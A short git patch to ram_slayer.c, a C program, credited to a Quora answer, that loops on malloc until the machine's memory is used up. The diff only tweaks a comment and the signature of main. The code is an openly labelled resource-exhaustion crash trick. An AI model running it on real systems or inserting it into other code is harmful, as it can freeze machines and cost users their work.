From 931919b671b2db5853e2496f037d3a94b2bb4a30 Mon Sep 17 00:00:00 2001 From: Minhas Kamal Date: Wed, 14 Dec 2016 07:47:21 +0600 Subject: [PATCH] ram slayer --- ram_slayer.c | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/ram_slayer.c b/ram_slayer.c index c1e0b83..1860dba 100644 --- a/ram_slayer.c +++ b/ram_slayer.c @@ -1,7 +1,6 @@ // Source: https://www.quora.com/What-is-your-smallest-piece-of-code-that-can-crash-the-computer/answer/George-Gonzalez-5?srid=u2HNX -// Usees up all of RAM. +// Usees up all space of RAM. -int main(){ +main(){ while(malloc(1000)); - return 0; }